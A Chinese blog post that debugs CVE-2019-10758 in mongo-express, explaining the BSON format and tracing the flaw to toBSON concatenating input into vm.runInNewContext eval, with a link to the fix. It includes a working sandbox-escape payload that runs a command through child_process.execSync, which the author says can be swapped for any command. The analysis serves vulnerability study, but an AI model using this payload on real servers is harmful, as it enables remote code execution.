• CVE-2019-10758漏洞debug过程(nodejs)


    CVE-2019-10758

    根据https://github.com/masahiro331/CVE-2019-10758/blob/master/main.js的内容可知,在上一篇里已经讲了怎么debug调试nodejs。

    所以在工作区新建一个test.js的文件。内容为:

    exploit = "this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/CotEditor.app/Contents/MacOS/CotEditor')"
    
    var bson = require('mongo-express/lib/bson')
    bson.toBSON(exploit)

    至于想执行的命令可以自行更改,我这边是运行一个mac下的软件。

    根据poc可知,漏洞关键点在bson库里的toBSON函数。百度一下bson是什么东西?和json又有什么关系?

    引用:https://blog.csdn.net/m0_38110132/article/details/77716792

    参考百科说明:BSON( Binary Serialized Document Format) 是一种二进制形式的存储格式,采用了类似于 C 语言结构体的名称、对表示方法,支持内嵌的文档对象和数组对象,具有轻量性、可遍历性、高效性的特点,可以有效描述非结构化数据和结构化数据。

    BSON是一种类json的一种二进制形式的存储格式,简称Binary JSON,它和JSON一样,支持内嵌的文档对象和数组对象,但是BSON有JSON没有的一些数据类型,如Date和BinData类型。
    BSON可以做为网络数据交换的一种存储形式,这个有点类似于Google的Protocol Buffer,但是BSON是一种schema-less的存储形式,它的优点是灵活性高,但它的缺点是空间利用率不是很理想,
    BSON有三个特点:轻量性、可遍历性、高效性。

    例子

    一个Document的BSON表示

    {
        title:"MongoDB",
        last_editor:"192.168.1.122",
        last_modified:new Date("27/06/2011"),
        body:"MongoDB introduction",
        categories:["Database","NoSQL","BSON"],
        revieved:false
    }

    这是一个简单的BSON结构体,其中每一个element都是由key/value对组成的

    一个嵌套的例子

    {
        name:"lemo",
        age:"12",
        address:{
            city:"suzhou",
            country:"china",
            code:215000
        } ,
        scores:[
            {"name":"english","grade:3.0},
            {"name":"chinese","grade:2.0}
        ]
    }

    这是一种相对复杂点的例子,其中包括了地址对象和分数对象数组,这里使用了嵌套文档对象与文档对象数据来表示单个学生的信息,这种嵌套的文档结构要使用关系数据库来做是比较复杂的。
    与JSON的区别
    以下内容参考自 http://blog.csdn.net/z69183787/article/details/26709505 感谢谢原作者。
    BSON是由10gen开发的一个数据格式,目前主要用于MongoDB中,是mongodb的数据存储格式。BSON基于JSON格式,选择JSON进行改造的原因主要是JSON的通用性及JSON的schemaless的特性。
    BSON主要会实现以下三点目标:
    (1)更快的遍历速度
    对JSON格式来说,太大的JSON结构会导致数据遍历非常慢。在JSON中,要跳过一个文档进行数据读取,需要对此文档进行扫描才行,需要进行麻烦的数据结构匹配,比如括号的匹配,而BSON对JSON的一大改进就是,它会将JSON的每一个元素的长度存在元素的头部,这样你只需要读取到元素长度就能直接seek到指定的点上进行读取了。
    (2)操作更简易
    对JSON来说,数据存储是无类型的,比如你要修改基本一个值,从9到10,由于从一个字符变成了两个,所以可能其后面的所有内容都需要往后移一位才可以。而使用BSON,你可以指定这个列为数字列,那么无论数字从9长到10还是100,我们都只是在存储数字的那一位上进行修改,不会导致数据总长变大。当然,在MongoDB中,如果数字从整形增大到长整型,还是会导致数据总长变大的。
    (3)增加了额外的数据类型
    JSON是一个很方便的数据交换格式,但是其类型比较有限。BSON在其基础上增加了“byte array”数据类型。这使得二进制的存储不再需要先base64转换后再存成JSON。大大减少了计算开销和数据大小。
    但是,在有的时候,BSON相对JSON来说也并没有空间上的优势,比如对{“field”:7},在JSON的存储上7只使用了一个字节,而如果用BSON,那就是至少4个字节(32位)
    目前在10gen的努力下,BSON已经有了针对多种语言的编码解码包。并且都是Apache 2 license下开源的。并且还在随着MongoDB进一步地发展。

     1 exports.toBSON = function (string) {
     2   var sandbox = exports.getSandbox();
     3 
     4   string = string.replace(/ISODate(/g, 'new ISODate(');
     5   string = string.replace(/Binary(("[^"]+"),/g, 'Binary(new Buffer($1, "base64"),');
     6 
     7   vm.runInNewContext('doc = eval((' + string + '));', sandbox);
     8 
     9   return sandbox.doc;
    10 };

    跟踪来到第7行,发现eval和之前string代码进行拼接了。百度查看vm.runInNewContext的函数意义。

    emmm。。。。运行js代码。。。那就直接拼接了代码。。。。直接执行了命令。

    查看这个文件的history。发现修复方式是删除了vm这个库的引用。

    https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2#diff-a3edef2410fccadc68e7b4237d3495d6

  • 相关阅读:
    Java内置包装类
    for循环思路题
    常用函数
    函数
    冒泡排序
    数组的运用
    for循环中有意思的练习题。
    for循环
    运算中容易出现的错误
    分支的运用
  • 原文地址:https://www.cnblogs.com/ph4nt0mer/p/12162629.html
Copyright © 2020-2023  润新知